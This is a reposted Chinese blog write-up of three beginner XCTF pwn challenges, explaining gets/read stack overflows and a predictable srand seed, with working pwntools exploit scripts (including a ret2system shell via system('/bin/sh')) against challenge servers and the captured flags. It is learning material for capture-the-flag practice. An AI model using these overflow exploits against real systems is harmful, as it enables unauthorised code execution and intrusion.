【CTF】Pwn入門 XCTF 部分writeup


✨碎碎念

咕咕咕了好久的Pwn,臨時抱佛腳入門一下。

先安利之前看的一個 Reverse+Pwn 講解視頻

講的還是很不錯的,建議耐心看完

另外感覺Reverse和Pwn都好難!!

不,CTF好難!!

 

之前學C的時候了解過gets()函數很危險

一般筆者會使用如下代碼代替gets()

scanf("%[^\n]%*c",a);

學了Pwn更直觀地感受到了這一點

 

關於scanf的更多用法詳見

https://blog.csdn.net/jeffasd/article/details/80705487

 

✨堆棧示意圖

✨writeup

 

when_did_you_born

題目鏈接:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5051&page=1

 

附件是沒有擴展名的文件

//后面的題目就不提了附件了應該都是Linux文件

剛剛開始入門Pwn

 

參考

https://www.cnblogs.com/yidianhan/p/11583561.html

 

IDA64打開 F5反編譯

很明顯gets函數的地方存在漏洞

//學C的時候就應該知道這個函數存在風險

// gets從標准輸入設備讀字符串函數,其可以無限讀取,不會判斷上限,以回車結束讀取,所以程序員應該確保buffer的空間足夠大,以便在執行讀操作時不發生溢出。

 

要v5不等於1926才能進入else

而cat flag又需要v5等於1926

 

雙擊變量v4 v5存放在同一個stack中

看IDA最上面的rsp rbp也可以看出來

源代碼可知先壓v5再壓v4

 

構造exp壓v4的時候覆蓋v5的值

 

//wp中的exp有問題

//第一次不是send 1926 send其他值才能進入else

修改如下

from pwn import *

p=remote('220.249.52.133',34030)
shellcode=b'a'*8+p64(1926)
p.recvuntil('Your Birth?')
p.sendline('1')
p.sendline(shellcode)
p.interactive()

Flag:cyberpeace{0541792f47eb4f7c642d2d7af1b5885f}

 

//噗隨機出來50額外金幣 叫我歐皇!

結束。

 

level2

題目鏈接:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5055&page=1

IDA打開 F5反編譯

???

 

參考

https://blog.csdn.net/macro_wing/article/details/98243439

https://www.cnblogs.com/yidianhan/p/11597188.html

 

代碼非常簡單

溢出點在read函數

需要通過read溢出最后執行

system(‘/bin/sh’)獲得shell

esp 0 ebp -88

offset=88

 

wp中的exp遇到如下報錯

!注意:python3中next()方法更名了 修改為__next__()

 

參考

https://blog.csdn.net/gaifuxi9518/article/details/81059938

 

修改了wp中的exp

from pwn import *

elf=ELF('./level2')
p=remote('220.249.52.133',39494)
sys_addr=elf.symbols['system']
bin_addr=elf.search('/bin/sh').__next__()
shellcode='a'*(0x88+0x4)+p32(sys_addr)+p32(0)+p32(bin_addr)
p.recvline
p.sendline(shellcode)
p.interactive()
p.close()

!不要再用windows打Pwn了 拿到shell也執行不了

//好吧怎么可能有人用windows打Pwn 然而一開始我踩坑了

取得shell后ls然后cat flag

 

Flag:cyberpeace{6c8681084181617bd2e2a7bbb0a2a169}

結束。

 

guess_num

題目鏈接:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5057&page=1

開啟了canary棧保護 不能直接溢出棧

 

IDA64打開 F5反編譯

代碼邏輯清晰srand生成隨機數種子 然后循環遍歷生成隨機數 猜對數字cat flag

溢出點在gets

seed數組 rsp+30 rbp-10

v9 rsp+10 rbp-30

offset=20

 

參考

https://blog.csdn.net/macro_wing/article/details/99236880

https://www.cnblogs.com/644-bbbb/p/12741211.html

 

srand初始化隨機種子,rand產生隨機數。隨機函數生成的隨機數並不是真的隨機數,他們只是在一定范圍內隨機,實際上是一段數字的循環,這些數字取決於隨機種子。在調用rand()函數時,必須先利用srand()設好隨機數種子,如果未設隨機數種子,rand()在調用時會自動設隨機數種子為1。

對於該題目,我們將隨機種子設置為0或1都是可以的。

 

編寫exp時需要用到libc共享庫 使用ctypes模塊

先ldd命令查找libc共享庫位置

 

exp

from pwn import *
from ctypes import *
p = remote('220.249.52.133',46393)
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')

payload = b'a' * 0x20 + p64(1)

p.sendlineafter("name:",payload)
#get offset is 0x20,edit seed as 1
libc.srand(1)
for i in range(10):
    p.recvuntil("number:")
    p.sendline(str(libc.rand()%6+1))
p.interactive()

 

Flag:cyberpeace{473602a1807e5a385d0ea90b25b67d55}

結束。

 

⭐轉載請注明出處

本文作者:雙份濃縮馥芮白

原文鏈接:https://www.cnblogs.com/Flat-White/p/13643265.html

版權所有,如需轉載請注明出處。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM